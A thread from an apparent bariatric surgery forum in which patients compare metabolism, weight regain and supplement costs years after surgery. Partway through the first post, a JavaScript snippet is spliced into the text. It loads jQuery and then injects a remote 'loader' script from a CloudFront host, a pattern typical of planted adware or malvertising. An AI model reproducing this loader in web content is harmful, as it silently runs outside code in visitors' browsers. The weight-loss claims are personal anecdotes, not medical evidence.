Our metabolisms are different...

Wow did I have an A-Ha moment.  My best girlfriend visited me for a week, she and I ate the same things and most of the time I ate much less.  We even had the same activity level.  She lost 10 lbs and I stayed the same!  It really amazed me and makes me rather upset at my surgeon's office accusing me of eating over 2,000 calories a day since my weight is up.  They still contend that we malabsorb calories almost 6 years out...And their literature hasn't changed in six years.  They only blood tested me for B-12, Iron and Folic Acid.  They are a center of excellence....Just food for thought if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

You are so right. And some of us were like that preop. I know I did.  Now it is even worse.

 The only thing that I malabsorb these days is money.  I can burn it quickly.

Amen ladies! As I look at my vitamin and shake bill. Luckily my mother just bought me 2 cases of shakes from Sams so I should be good for a while. I am not having a pity party over it, I know we are different. I accept that we are different, metabolically speaking. I just was shocked as to the extent of it. 10 whole lbs!! Me, the same! Unreal. But you 2 ladies are living proof that we can play the hand we are dealt and lose and maintain to goal. Have a great day!

I have a friend who was sleeved a week after me. She eats nothing but junk. Her diet consists of any kind of junk food you can imagine.

She also gets up in the night and eats chocolate. She ate an entire box of chocolates in one sitting.

She weighs 20 lbs less than me, and eats pizza, bread, sweets, everything wrong, in addition to all her meals. I don't get it. She doesn't exercise. I exercise my brains out, and I gain immediately if I eat anything that's not normal good food. She has not gained one ounce since hitting goal 3 years ago.

I hate that!

 I totally agree that it changed my metabolism for the negative but there were other factors involved as to why ive gained weight.....I had a car accident 2 years ago and it resulted in being diagnosed about 4 months ago with fibromyalgia which causes stiffness and pain but something else happened after the accident that didnt occur before- i was able to maintain my weight for over 5 years and even had doctors saying i needed to put weight on then after the accident i put on weight! ugh and no i didnt change my diet or my routine.......so I believe metabolism changes and makes it harder to get the weight off after many years of RNY
There are three ways of dealing with difference: domination, compromise and integration. By domination only one side gets what it wants; by integration we find a way by which both sides may get what they wish.........
